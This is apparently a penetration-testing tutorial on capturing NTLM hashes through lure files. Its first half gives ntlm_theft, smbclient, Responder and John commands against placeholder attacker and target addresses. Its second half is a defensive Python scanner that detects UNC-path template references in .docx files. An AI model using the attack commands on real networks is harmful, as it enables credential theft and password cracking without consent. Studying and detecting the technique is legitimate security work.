Dumping NTLM hashes via docx file using NTLM Theft
In this step of the exploitation process, we use ntlm_theft.py together with Responder to capture NTLM authentication hashes from the target system. NTLM is commonly used in Windows environments for authentication, and the captured hashes can be valuable for further penetration testing.
https://github.com/Greenwolf/ntlm_theft
- Generate malicious files: run ntlm_theft.py with the appropriate parameters to generate files containing payloads designed to capture NTLM hashes:

  python3 ntlm_theft.py -g all -s <ATTACKER_IP> -f <FILE_NAME>

  Explanation of options:
  -g: specifies the file types to generate for the related attacks (all generates every supported type).
  -s: sets the server IP, which in this case is the IP address of our Kali machine where Responder will be running.
  -f: specifies the base filename for the generated files; ntlm_theft writes them into a folder of the same name.

- Upload files to the SMB share: upload the generated files to an SMB share on the target system, preferably in a location where they are likely to be accessed:

  smbclient //<TARGET_IP>/<SHARE_NAME> -c "cd <DIRECTORY>; put <FILE_NAME>"

- Set up Responder: start Responder on your attacking machine to listen for LLMNR and NBT-NS requests and capture authentication attempts:

  responder -I <INTERFACE>

- Trigger authentication requests: wait for a user on the target system to open one of the uploaded files. The file references the attacker's host, so the user's machine authenticates to Responder and the NTLM challenge/response is logged.

Once you have the captured hashes, you can crack them with John or Hashcat. Responder logs Net-NTLMv2 challenge/responses rather than raw NT hashes, so use the netntlmv2 format:

john --format=netntlmv2 --wordlist=<WORDLIST_FILE> <HASH_FILE>
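From the defender's side, the docx variant of this technique relies on an Office relationship (for example an attached template) whose Target is a UNC path or file:// URL on a remote host, which makes Word authenticate to that host when the document is opened. The scanner below is an added example, not code from this page or from the ntlm_theft project: it walks every .rels part inside a .docx and reports relationships with such targets, which is the check a mail gateway or file-share scan would run on documents before users open them. The sample document, the 192.0.2.10 address and the function names are constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Matches a UNC path (\\host\share\...) or a file:// URL; both cause an SMB/WebDAV
# connection, and therefore an NTLM authentication, to the named host.
REMOTE_TARGET_RE = re.compile(r"^(\\\\[^\\]+\\|file://)", re.IGNORECASE)


def find_external_unc_targets(docx_bytes):
    """Return (rels_part, relationship_id, target) for every relationship in the
    .docx whose Target points at a UNC path or file:// URL. An empty list means
    no relationship would make the client authenticate to a remote host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue  # only relationship parts carry external targets
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if REMOTE_TARGET_RE.match(target):
                    findings.append((name, rel.get("Id"), target))
    return findings


def build_sample_docx(template_target):
    """Constructed minimal .docx (just enough parts for the scanner to walk, not a
    file Word would open) whose settings part references an attached template."""
    rels = (
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        f'Target="{template_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    suspicious = build_sample_docx(r"\\192.0.2.10\share\template.dotx")  # constructed
    benign = build_sample_docx("https://example.com/template.dotx")      # constructed
    for label, doc in (("suspicious", suspicious), ("benign", benign)):
        print(label, find_external_unc_targets(doc))
```

Run the block directly to see the suspicious sample flagged and the HTTPS-referencing sample pass; to scan a real file, read it with open(path, "rb") and pass the bytes to find_external_unc_targets.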